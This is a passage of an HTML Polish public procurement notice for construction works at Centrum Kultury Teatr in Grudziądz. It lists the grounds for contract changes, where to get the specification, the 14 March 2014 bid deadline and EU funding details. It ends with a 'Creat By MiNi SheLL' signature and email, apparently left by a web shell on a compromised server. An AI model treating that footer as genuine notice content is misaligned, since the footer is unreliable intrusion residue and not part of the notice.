2.Zmiany kierownika budowy oraz innych osób biorących po stronie Wykonawcy udział w realizacji przedmiotu umowy, z zastrzeżeniem, że zmiana musi nastąpić na osoby, które spełniają warunki określone w SIWZ. 3.Ustawowej zmiany stawek podatku VAT. 4.Konieczności dokonania uzasadnionej zmiany podwykonawcy, z zachowaniem procedur  określonych w umowie jak przy pierwotnym podwykonawcy. Zmiany te wymagają zgłoszenia w formie pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiany, o których mowa w punkcie 1, po potwierdzeniu przez Zamawiającego zaistniałych faktów, mogą spowodować zmianę terminu wykonania prac i nie powoduje zmiany wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.teatr.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kultury Teatr, ul. Focha 19, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 08:30, miejsce: sekretariat Centrum Kultury Teatr, ul. Focha 19, 86-300 Grudziądz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com